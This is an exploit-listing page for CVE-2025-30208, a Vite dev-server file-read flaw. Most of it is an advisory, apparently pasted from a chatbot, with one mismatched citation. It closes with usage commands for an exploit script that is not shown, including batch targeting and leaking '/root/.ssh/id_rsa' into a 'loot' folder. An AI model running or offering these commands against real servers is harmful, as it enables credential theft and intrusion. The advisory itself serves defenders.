Exploit for CVE-2025-30208

Name: Exploit for CVE-2025-30208
Rating: 5 (5 reviews)
2025-06-25 | CVSS 5.3
## https://sploitus.com/exploit?id=61372CD4-3835-550C-85E6-2342B2803317
# CVE-2025-30208 Vite Arbitrary File Read vulnerability 🌌

Here's a detailed overview of **CVE‑2025‑30208**, a medium-severity arbitrary file‑read vulnerability in Vite’s dev server:

---

## 🛠️ What is it?

* Vite’s `@fs` module allows static file access in development mode with path allowances controlled by `server.fs.allow`.
* Versions **before** 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 contain a flaw: URLs crafted with trailing query markers like `?raw??` or `?import&raw??` can bypass access restrictions and expose arbitrary files (e.g., system or source files) ([nvd.nist.gov][1]).

---

## 🔍 Who's affected?

* Vite dev‑servers explicitly **exposed to the network**, enabled via `--host` or `server.host`.
* Vulnerable version ranges:

  * 4.5.0 – 4.5.9
  * 5.0.0 – 5.4.14
  * 6.0.0 – 6.2.2 (with sub-versions as detailed) ([nsfocusglobal.com][2]).

---

## ⚠️ Severity & Impact

* **CVSS 3.1 score: 5.3 (Medium 🟠)**: Network attack, no privileges, high confidentiality impact ([wiz.io][3]).
* Exploitability: straightforward via crafted HTTP requests out of development servers ([wiz.io][3]).
* Public PoC is available, including scripts demonstrating `/etc/passwd` leaks ([github.com][4]).

---

## 🛡️ Mitigation & Response

* **Upgrade Vite** to one of the patched versions:

  * **6.2.3**, **6.1.2**, **6.0.12**, **5.4.15**, or **4.5.10** ([nvd.nist.gov][1]).
* **Avoid exposing** dev servers to public networks; limit with `localhost` or firewall rules ([wiz.io][3]).
* Additional scanning tools (e.g., NSFocus EZ, Sangfor, Tenable) support detection ([nsfocusglobal.com][2]).

---

## ✅ Summary Table
```
| Aspect             | Details                                                    |
| ------------------ | ---------------------------------------------------------- |
| **Flaw**           | `@fs` path filter bypass via malformed query strings       |
| **Versions**       | <4.5.10, <5.4.15, <6.0.12, <6.1.2, <6.2.3                  |
| **Severity**       | Medium (CVSS 5.3), network exploit, confidentiality impact |
| **Exploitability** | Easy; PoC exists                                           |
| **Patched in**     | Vite 4.5.10, 5.4.15, 6.0.12, 6.1.2, 6.2.3                  |
| **Mitigation**     | Upgrade + avoid exposing dev server                        |
```
---

## 🔗 References & Sources

* NVD / GitHub Advisory (Mar 24 2025) ([nvd.nist.gov][1], [wiz.io][3], [security.snyk.io][5], [recordedfuture.com][6])
* Technical writeups: NSFocus, Sangfor, Snyk, Recorded Future&#x20;
---

## ✅ Recommended Next Steps

1. **Audit your Vite versions** in development environments, especially any exposed externally.
2. **Upgrade** immediately to a fixed version.
3. **Restrict access** to development servers—bind to `localhost`, use VPNs or firewalls.
4. **Run security scans/tools** to detect CVE‑2025‑30208 in your infrastructure.
5. **Monitor your logs** for suspicious `/@fs/...?...?` requests.

Let me know if you'd like help implementing fixes, crafting firewall rules, or assessing exposure!

[1]: https://nvd.nist.gov/vuln/detail/CVE-2025-30208?utm_source=chatgpt.com "CVE-2025-30208 Detail - NVD"
[2]: https://nsfocusglobal.com/vite-arbitrary-file-read-vulnerability-cve-2025-30208/?utm_source=chatgpt.com "Vite Arbitrary File Read vulnerability (CVE-2025-30208) - NSFocus"
[3]: https://www.wiz.io/vulnerability-database/cve/cve-2025-30208?utm_source=chatgpt.com "CVE-2025-30208 Impact, Exploitability, and Mitigation Steps | Wiz"
[4]: https://security.snyk.io/vuln/SNYK-JS-VITE-9512410?utm_source=chatgpt.com "Incorrect Authorization in vite | CVE-2025-30208 | Snyk"
[5]: https://www.recordedfuture.com/vulnerability-database/CVE-2025-30208?utm_source=chatgpt.com "CVE-2025-30208 Description, Impact and Technical Details"



## Examples:

1- Single target exploitation:
```
python3 cve-2025-30208.py -u example.com:5173
```
2- Single target with custom LFI path to leak the file we want:
```
python3 cve-2025-30208.py -u example.com:5173 -p '/root/.ssh/id_rsa'
```
3- Batch exploitation with multiple targets:
```
python3 cve-2025-30208.py -f targets.txt
```
4- Custom bypass query:
```
python3 cve-2025-30208.py -u example.com:5173 -b "?raw&url"
```
5- Using a proxy (e.g. Burp Suite):
```
python3 cve-2025-30208.py -u example.com:5173 --proxy http://127.0.0.1:8080
```
6- Custom output directory:
```
python3 cve-2025-30208.py -u example.com:5173 -o ./loot
```
7- Increase thread count in batch mode:
```
python3 cve-2025-30208.py -f targets.txt -t 50
```

## ⚠️ Disclaimer

This project is created for **educational and research purposes only**. The author is not responsible for any misuse of this tool or information provided herein.

Using this software against systems without explicit permission is **illegal** and strictly prohibited. Always ensure you have **written authorization** before performing any security testing.

By using this repository, you agree to comply with all applicable local, state, national, and international laws.